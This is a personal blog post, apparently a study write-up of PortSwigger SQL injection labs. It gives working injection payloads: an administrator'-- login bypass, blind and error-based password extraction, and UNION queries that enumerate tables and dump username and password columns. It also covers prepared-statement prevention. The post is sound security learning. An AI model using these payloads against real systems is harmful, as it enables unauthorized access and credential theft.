<!DOCTYPE html>
<html lang="en-US">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Dieno">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/12/03/sql-injection/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="Dieno, no die.">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL injection">
<meta property="og:url" content="http://example.com/2024/12/03/SQL-injection/index.html">
<meta property="og:site_name">
<meta property="og:description" content="Dieno, no die.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2024-12-02T16:42:04.000Z">
<meta property="article:modified_time" content="2024-12-08T15:31:55.716Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="PortSwigger">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/dieno.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/dieno.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/dieno.png">
    <!--- Page Info-->
    
    <title>
        
            SQL injection | Dieno&#39;s Blog
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
        <link href="" rel="stylesheet">
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en-US","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":["-Goblin-"]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":5,"number":false,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推薦閱讀","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":true,"family":"Times New Roman, serif","url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Dieno, no die."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven0.png","dark":"/images/wallhaven4.jpg"},"title":"Dieno's Blog","subtitle":{"text":["Dieno, no die.","Hackers know no die, they just find new exploits."],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/di3n0","instagram":null,"zhihu":null,"twitter":null,"email":null,"discord":"https://discordapp.com/users/463298829735821312"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"},"Friends":{"icon":"fa-regular fa-link","submenus":{"Dkoctro":"https://dkoctro.github.io/","Chihhhs":"https://chihhhs.github.io/","Kting":"https://ktkting.github.io/"}}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"right","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2024/1/20 00:00:00"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Dieno&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-regular fa-tags fa-fw"></i>
                                    TAGS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    FRIENDS
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://dkoctro.github.io/">
                                                    DKOCTRO
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://chihhhs.github.io/">
                                                    CHIHHHS
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://ktkting.github.io/">
                                                    KTING
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                TAGS
                            </span>
                            
                                <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-Friends"
                        >
                            <span>
                                FRIENDS
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-Friends">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://dkoctro.github.io/">DKOCTRO</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://chihhhs.github.io/">CHIHHHS</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://ktkting.github.io/">KTING</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">4</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">11</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">SQL injection</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/dieno.png">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">Dieno</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">-Goblin-</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-12-03 00:42:04</span>
        <span class="mobile">2024-12-03 00:42:04</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-12-08 23:31:55</span>
            <span class="mobile">2024-12-08 23:31:55</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/PortSwigger/">PortSwigger</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<ul>
<li><a class="link"   target="_blank" rel="noopener" href="https://portswigger.net/web-security/all-labs" >All labs<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li>
<li><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection"><em>SQL Injection</em></a></li>
<li><a class="link"   target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection/cheat-sheet" >SQL injection cheat sheet<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li>
</ul>
<br>
<br>

<h4 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h4><div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> products  <span class="comment">--從 products 表格中選取所有欄位</span></span><br><span class="line"><span class="keyword">WHERE</span> category <span class="operator">=</span> <span class="string">&#x27;Gifts&#x27;</span> <span class="comment">--篩選 category 欄位值為 &#x27;Gifts&#x27; 的記錄</span></span><br><span class="line"><span class="keyword">AND</span> released <span class="operator">=</span> <span class="number">1</span> <span class="comment">--進一步篩選 released 欄位值為 1 的記錄</span></span><br></pre></td></tr></table></figure></div>
<br>
<br>

<ul>
<li><code>UPDATE</code> ：用於設定更新值或 WHERE 條件</li>
<li><code>INSERT</code> ：用於設定要插入的值</li>
<li><code>SELECT</code> ：用於指定表格或欄位名稱</li>
<li><code>ORDER BY</code> ：用於排序條件</li>
</ul>
<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="comment">-- 選取所有欄位</span></span><br><span class="line"><span class="keyword">UPDATE</span> users <span class="keyword">SET</span> <span class="operator">*</span> <span class="operator">=</span> <span class="keyword">NULL</span> <span class="comment">-- 將所有欄位設為 NULL</span></span><br><span class="line"><span class="keyword">INSERT</span> <span class="keyword">INTO</span> users <span class="keyword">VALUES</span> (<span class="operator">*</span>) <span class="comment">-- 插入所有欄位的值</span></span><br><span class="line"><span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="operator">*</span> <span class="comment">-- 按所有欄位排序</span></span><br></pre></td></tr></table></figure></div>

<p><br><br></p>
<p>SQL injection examples</p>
<ul>
<li>Retrieving hidden data</li>
<li>Subverting application logic</li>
<li>UNION attacks<ul>
<li>Determining the number of columns</li>
<li>Finding columns with a useful data type</li>
<li>Retrieving interesting data</li>
<li>Retrieving multiple values in a single column</li>
</ul>
</li>
<li>Blind SQL injection<ul>
<li>What is blind SQL injection?</li>
<li>Triggering conditional responses</li>
<li>Error-based SQL injection</li>
<li>Triggering time delays</li>
<li>Out-of-band (OAST) techniques</li>
<li>Preventing blind SQL injection</li>
</ul>
</li>
</ul>
<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4</span></span><br><span class="line"><span class="keyword">SELECT</span> TrackingId <span class="keyword">FROM</span> TrackedUsers <span class="keyword">WHERE</span> TrackingId <span class="operator">=</span> <span class="string">&#x27;u5YD3PapBcR4lN3e7Tj4&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">-- …xyz&#x27; AND &#x27;1&#x27;=&#x27;1</span></span><br><span class="line">xyz<span class="string">&#x27; AND SUBSTRING((SELECT Password FROM Users WHERE Username = &#x27;</span>Administrator<span class="string">&#x27;), 1, 1) &gt; &#x27;</span>m</span><br><span class="line">xyz<span class="string">&#x27; AND SUBSTRING((SELECT Password FROM Users WHERE Username = &#x27;</span>Administrator<span class="string">&#x27;), 1, 1) = &#x27;</span>s</span><br></pre></td></tr></table></figure></div>
<p><br><br></p>
<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- This command will not trigger an error because the condition (1=2) is always false. </span></span><br><span class="line"><span class="comment">-- The subquery returns &#x27;a&#x27;, making the overall condition true.</span></span><br><span class="line"><span class="string">&#x27; AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE &#x27;</span>a<span class="string">&#x27; END)=&#x27;</span>a</span><br><span class="line"></span><br><span class="line"><span class="comment">-- This command will trigger an error because the condition is true, </span></span><br><span class="line"><span class="comment">-- causing the 1/0 operation to execute, resulting in a mathematical error.</span></span><br><span class="line"><span class="string">&#x27; AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE &#x27;</span>a<span class="string">&#x27; END)=&#x27;</span>a</span><br></pre></td></tr></table></figure></div>
<p>If the server does not properly sanitize the input, these commands will execute, proving the existence of an SQL Injection vulnerability. If the error causes a difference in the application’s HTTP response, you can use this to determine whether the injected condition is true.</p>
<p><br><br><br><br><br></p>
<p>Examining the database</p>
<ul>
<li>Querying the type and version</li>
<li>Listing the contents</li>
</ul>
<p><br><br></p>
<p>How to prevent SQL injection</p>
<ul>
<li>Whitelisting permitted input values.</li>
<li>Using different logic to deliver the required behavior.</li>
</ul>
<div class="code-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- The user input is concatenated directly into the query.</span></span><br><span class="line">String query <span class="operator">=</span> &quot;SELECT * FROM products WHERE category = &#x27;&quot;<span class="operator">+</span> input <span class="operator">+</span> &quot;&#x27;&quot;; </span><br><span class="line">Statement statement <span class="operator">=</span> connection.createStatement();</span><br><span class="line">ResultSet resultSet <span class="operator">=</span> statement.executeQuery(query);</span><br><span class="line"></span><br><span class="line"><span class="comment">-- This code in a way that prevents the user input from interfering with the query structure.</span></span><br><span class="line">PreparedStatement statement <span class="operator">=</span> connection.prepareStatement(&quot;SELECT * FROM products WHERE category = ?&quot;);</span><br><span class="line">statement.setString(<span class="number">1</span>, input);</span><br><span class="line">ResultSet resultSet <span class="operator">=</span> statement.executeQuery();</span><br></pre></td></tr></table></figure></div>

<br>
<br>

<h4 id="SQL-injection-cheat-sheet"><a href="#SQL-injection-cheat-sheet" class="headerlink" title="SQL injection cheat sheet"></a>SQL injection cheat sheet</h4><div style="text-align: justify">

<p>When a query returns only a single column, you can combine multiple values using concatenation operators. For example in Oracle, using <code>&#39; UNION SELECT username || &#39;~&#39; || password FROM users--</code> will concatenate usernames and passwords with a ~ separator.</p>
</div>

<table>
<thead>
<tr>
<th align="center">Database</th>
<th align="center">String Concatenation</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Oracle</td>
<td align="center">‘foo’||’bar’</td>
</tr>
<tr>
<td align="center">Microsoft</td>
<td align="center">‘foo’+’bar’</td>
</tr>
<tr>
<td align="center">PostgreSQL</td>
<td align="center">‘foo’||’bar’</td>
</tr>
<tr>
<td align="center">MySQL</td>
<td align="center">‘foo’ ‘bar’ or CONCAT(‘foo’,’bar’)</td>
</tr>
</tbody></table>
<div style="text-align: justify">

<p><code>dual</code> is a special table in Oracle database that contains only one row and one column. It’s commonly used when you need to execute SQL queries without accessing actual data tables - essentially acting as a dummy or temporary table.<br><code>&#39; UNION SELECT &#39;abc&#39; FROM dual</code></p>
</div>

<br>

<table>
<thead>
<tr>
<th align="center">Database type</th>
<th align="center">Query for version</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Microsoft, MySQL</td>
<td align="center"><code>SELECT @@version</code></td>
</tr>
<tr>
<td align="center">Oracle</td>
<td align="center"><code>SELECT * FROM v$version</code></td>
</tr>
<tr>
<td align="center">PostgreSQL</td>
<td align="center"><code>SELECT version()</code></td>
</tr>
</tbody></table>
<p><code>&#39; UNION SELECT banner,&#39;def&#39; FROM v$version--</code></p>
<br>

<p>Query information_schema.tables to list the tables in the database.<br><code>SELECT * FROM information_schema.tables</code></p>
<p>Query information_schema.columns to list the columns in individual tables.<br><code>SELECT * FROM information_schema.columns WHERE table_name = &#39;Users&#39;</code></p>
<p><br><br><br><br><br><br><br><br><br><br><br><br></p>
<h4 id="Lab-Vulnerability-in-WHERE-clause-allowing-retrieval-of-hidden-data"><a href="#Lab-Vulnerability-in-WHERE-clause-allowing-retrieval-of-hidden-data" class="headerlink" title="Lab: Vulnerability in WHERE clause allowing retrieval of hidden data"></a>Lab: Vulnerability in WHERE clause allowing retrieval of hidden data</h4><div style="text-align: justify">

<p>The url of the commodity in the shop is, <code>https://link/product?productId=7</code>.<br>When I changed the <code>productId=1</code>, I could see the unreleased products.</p>
<p>Use the filter, <code>https://link/filter?category=Clothing%2c+shoes+and+accessories</code>.<br>In the URL bar, you can see <code>category=</code>, so using <code>&#39; OR 1=1--</code> makes the condition after <code>category=</code> evaluate to true. When <code>category=&#39; OR 1=1--</code> is input, everything before the first <code>&#39;</code> and after <code>--</code> gets commented out in the SQL query, leaving just the <code>OR 1=1</code> condition which is always true.</p>
<p><code>https://link/filter?category=&#39;or 1=1--</code></p>
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Vulnerability-allowing-login-bypass"><a href="#Lab-Vulnerability-allowing-login-bypass" class="headerlink" title="Lab: Vulnerability allowing login bypass"></a>Lab: Vulnerability allowing login bypass</h4><div style="text-align: justify">
In the login page, you can see Username and Password fields. Entering `administrator'--` in the Username field comments out the Password part. This works like 

<p><code>SELECT * FROM users WHERE username = &#39;administrator&#39;--&#39; AND password = &#39;&#39;</code>.</p>
<p>Username: <code>administrator&#39;--</code><br>Password: <code>1234</code></p>
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Attack-querying-the-database-type-and-version-on-Oracle"><a href="#Lab-Attack-querying-the-database-type-and-version-on-Oracle" class="headerlink" title="Lab: Attack, querying the database type and version on Oracle"></a>Lab: Attack, querying the database type and version on Oracle</h4><div style="text-align: justify">

<p>First, try:<code>&#39; UNION SELECT &#39;abc&#39; FROM dual</code>. Then:<code>&#39; UNION SELECT &#39;abc&#39;,&#39;def&#39; FROM dual</code><br>Finally, modify to:<code>&#39; UNION SELECT banner,&#39;def&#39; FROM v$version--</code> to retrieve database version information.</p>
<p><code>https://link/filter?category=Pets&#39; UNION SELECT banner,&#39;def&#39; FROM v$version--</code></p>
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Attack-querying-the-database-type-and-version-on-MySQL-and-Microsoft"><a href="#Lab-Attack-querying-the-database-type-and-version-on-MySQL-and-Microsoft" class="headerlink" title="Lab: Attack, querying the database type and version on MySQL and Microsoft"></a>Lab: Attack, querying the database type and version on MySQL and Microsoft</h4><div style="text-align: justify">

<p>Testing with single quotes reveals improper handling, potentially making the website vulnerable to SQL Injection.<br>Using <code>&#39; ORDER BY 1--</code>, <code>&#39; ORDER BY 2--</code> … to test the number of columns.<br>In MySQL, using <code>#</code> as a comment terminator.<br>Finally using, <code>&#39; UNION SELECT @@version,&#39;James&#39;#</code>.<br>URL encoded as <code>&#39;+UNION+SELECT+%40%40version,NULL%23</code>.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/0.png"
                      width="400" height="200"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/1.png"
                      width="800" height="200"
                ></p>
<ul>
<li><a class="link"   target="_blank" rel="noopener" href="https://medium.com/@marduk.i.am/sql-injection-attack-querying-the-database-type-and-version-on-mysql-and-microsoft-caf947d0208a" >Reference<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></li>
</ul>
</div>
<br><br><br><br><br><br>

<h4 id="Lab-Attack-listing-the-database-contents-on-non-Oracle-databases"><a href="#Lab-Attack-listing-the-database-contents-on-non-Oracle-databases" class="headerlink" title="Lab: Attack, listing the database contents on non-Oracle databases"></a>Lab: Attack, listing the database contents on non-Oracle databases</h4><div style="text-align: justify">

<p>First, test <code>&#39;+UNION+SELECT+NULL--</code> and <code>&#39;+UNION+SELECT+NULL,NULL--</code><br>to determine the number of columns.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/2.png"
                      width="400" height="200"
                ></p>
<p>Then identify the table ID.<br><code>&#39;+UNION+SELECT+table_name,NULL+FROM+information_schema.tables--</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/3.png"
                      width="100" height="100"
                ></p>
<p>Target specific table (users_mhimoo).<br><code>&#39;+UNION+SELECT+column_name,NULL+FROM+information_schema.columns+where table_name=&#39;users_mhimoo&#39;--</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/4.png"
                      width="400" height="200"
                ></p>
<p>After discovering column names, extract username and password from the table.<br><code>&#39;+UNION+SELECT+username_vrield,password_azniol+FROM+users_mhimoo--</code></p>
<ul>
<li><a class="link"   target="_blank" rel="noopener" href="https://youtu.be/cC0_pFyvFtA?si=C4cIUIzHQBwINshy" >Reference<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></div>
<br><br><br><br><br><br></li>
</ul>
<h4 id="Lab-Attack-listing-the-database-contents-on-non-Oracle-databases-1"><a href="#Lab-Attack-listing-the-database-contents-on-non-Oracle-databases-1" class="headerlink" title="Lab: Attack, listing the database contents on non-Oracle databases"></a>Lab: Attack, listing the database contents on non-Oracle databases</h4><div style="text-align: justify">

<p>To check column count, <code>&#39;+UNION+SELECT+&#39;abc&#39;,&#39;def&#39;+FROM+dual--</code>。<br>To examine table metadata in Oracle, <code>&#39; UNION SELECT table_name,NULL FROM all_tables--</code>。<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/5.png"
                      width="400" height="200"
                ></p>
<p>Found a table named USERS_RJXFRE, therefore used,<br><code>&#39; UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name = &#39;USERS_RJXFRE&#39;--</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/6.png"
                      width="400" height="200"
                ></p>
<p>Next, input using the column names that were found<br><code>&#39; UNION SELECT USERNAME_ZDEKLC,PASSWORD_DIZLXT FROM USERS_RJXFRE--</code><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/portswigger/0/7.png"
                      width="400" height="200"
                ></p>
</div>
<br><br><br><br><br><br>


<h4 id="Lab-UNION-attack-determining-the-number-of-columns-returned-by-the-query"><a href="#Lab-UNION-attack-determining-the-number-of-columns-returned-by-the-query" class="headerlink" title="Lab: UNION attack, determining the number of columns returned by the query"></a>Lab: UNION attack, determining the number of columns returned by the query</h4><div style="text-align: justify">

<p>You can observe that the table has 3 columns, so after <code>UNION</code> you should add three <code>NULL</code> values.<br><code>https://link/filter?category=Gifts&#39; UNION SELECT NULL,NULL,NULL--</code></p>
</div>
<br><br><br><br><br><br>

